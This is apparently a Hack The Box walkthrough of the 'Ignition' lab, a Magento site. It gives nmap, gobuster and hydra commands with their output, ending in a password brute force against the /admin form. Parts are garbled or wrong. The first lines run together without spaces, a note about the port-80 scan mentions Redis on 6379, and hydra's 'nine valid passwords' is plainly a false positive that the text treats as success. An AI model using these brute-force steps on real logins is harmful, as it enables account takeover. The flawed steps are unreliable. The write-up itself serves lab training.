root@htb:~$sudonmap-sV-T4{targetIP}-p-PORTSTATESERVICEVERSION80/tcpopenhttpnginx1.14.2*Typically'-sV'isusedwithNmaptodetermineversions,butthat's not always enough. - adding the -sC is another good way to determine service versions - the -sC option will run safe scripts which are designed to provide useful information without being too intrusive or causing harm to the target systems.
VULNERABILITY SCANNING
root@htb:~$nmap-sV-sC-T4{targetIP}-p80PORTSTATESERVICEVERSION80/tcpopenhttpnginx1.14.2|_http-server-header:nginx/1.14.2|_http-title:Didnotfollowredirecttohttp://ignition.htb/*the-SCrunsthedefaultsetofNmapscripts (NSE scripts), which typically includescriptsforserviceenumeration,versiondetection,andotherbasicchecks.root@htb:~$sudonmap--script=vuln{targetIP}-p80PORTSTATESERVICE80/tcpopenhttp|_http-stored-xss:Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn'tfindanyCSRFvulnerabilities.|_http-dombased-xss:Couldn't find any DOM based XSS. | http-enum: | /setup/: Potentially interesting folder |_ /soap/: Potentially interesting folder * the --script=vuln will run scripts that focus specifically on detecting known vulnerabilities in the service running on port 6379 - e.g., weak configurations, or known vulnerabilities in the redis service - if no results are found then the service may be fully patched!
FOOTHOLD/COMPROMISE
Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
Hmm. We’re having trouble finding that site.
We can’t connect to the server at ignition.htb.
* ip address redirected to http://ignition.htb
root@htb:~$ curl -v {targetIP:port}
* Trying 10.129.208.53:80...
* Connected to 10.129.208.53 (10.129.208.53) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.129.208.53
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 302 Found
< Server: nginx/1.14.2
< Date: Sat, 22 Feb 2025 12:37:38 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=5377km0035lm9f1hpf62b1a5q8; expires=Sat, 22-Feb-2025 13:37:38 GMT; Max-Age=3600; path=/; domain=10.129.208.53; HttpOnly; SameSite=Lax
< Location: http://ignition.htb/
* target site is expecting a FQDN instead of IP Address as stated...
- HTTP/1.1 302 Found...Location http://ignition.htb/
root@htb:~$ echo "10.129.208.53 ignition.htb" | sudo tee -a /etc/hosts
10.129.208.53 ignition.htb
root@htb:~$ BROWSER > http://ignition.htb
* possible vulnerable entry points
- sign-in form
- create account form
- subcribe form
- orders & returns form
- contact web form
- advanced search form
#directory enumeration
root@htb:~$ find / -iname directory-list* 2>/dev/null
/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
root@htb:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@htb:~$ which gobuster
/usr/bin/gobuster
root@htb:~$ gobuster dir -u http://ignition.htb -w directory-list-2.3-small.txt
/contact (Status: 200) [Size: 28673]
/home (Status: 200) [Size: 25802]
/media (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
/0 (Status: 200) [Size: 25803]
/catalog (Status: 302) [Size: 0] [--> http://ignition.htb/]
/static (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
/admin (Status: 200) [Size: 7092]
/Home (Status: 301) [Size: 0] [--> http://ignition.htb/home]
...
* the vhost represents virtual host routing
* the -w represents the path to the wordlist
* the -u represents the target URL
* the --append-domain option is only required when conducting subdomain enumeration NOT directory brute forcing
#conduct OSINT
root@htb:~$ BROWSER > googleSearch
search: magento
* Magento is a free, open-source e-commerce platform that helps businesses create and manage online stores. It's written in PHP and uses the Open Software Licens
root@htb:~$ BROWSER > googleSearch
search: magento default credentials
username: admin
root@htb:~$ BROWSER > googleSearch
search: most common password list
...
root@htb:~$ nano commonPWs.txt
admin123
root123
password1
administrator1
changeme1
password123
qwerty123
administrator123
changeme123
#brute force
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL:ignition/admin
Requests
...
POST /admin HTTP/1.1
Host: ignition.htb
Content-Length: 78
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ignition.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ignition.htb/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: admin=cd4juor0dcuu0pid746li0jdqr
Connection: close
form_key=vEO8avkyPjmLQrhI&login%5Busername%5D=admin&login%5Bpassword%5D=qerty1
root@htb:~$ hydra -l admin -P commonPWs.txt ignition.htb http-post-form "/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 07:31:36
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:1/p:9), ~1 try per task
[DATA] attacking http-post-form://ignition.htb:80/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302
[80][http-post-form] host: ignition.htb login: admin password: root123
[80][http-post-form] host: ignition.htb login: admin password: changeme123
[80][http-post-form] host: ignition.htb login: admin password: password123
[80][http-post-form] host: ignition.htb login: admin password: changeme1
[80][http-post-form] host: ignition.htb login: admin password: administrator1
[80][http-post-form] host: ignition.htb login: admin password: administrator123
[80][http-post-form] host: ignition.htb login: admin password: admin123
[80][http-post-form] host: ignition.htb login: admin password: password1
[80][http-post-form] host: ignition.htb login: admin password: qwerty123
1 of 1 target successfully completed, 9 valid passwords found
* the user=^USER^&pass=^PASS^ represents the form parameter
- the specific format can be retrieved via Burp Suite or through the Browser's dev tools
- the S=302 is used to look for a successful login indicated by the HTTP status code 302
- Looking for a successful login indicated by the HTTP status code 302 is
necessary because, in many web applications, successful authentication
does not directly return a 200 OK response. Instead, it often redirects
the user to a different page after login, which is signified by
the 302 Found status code.
* Congratulations, your flag is: 797d6c988d9dc5865e010b9410f247e0
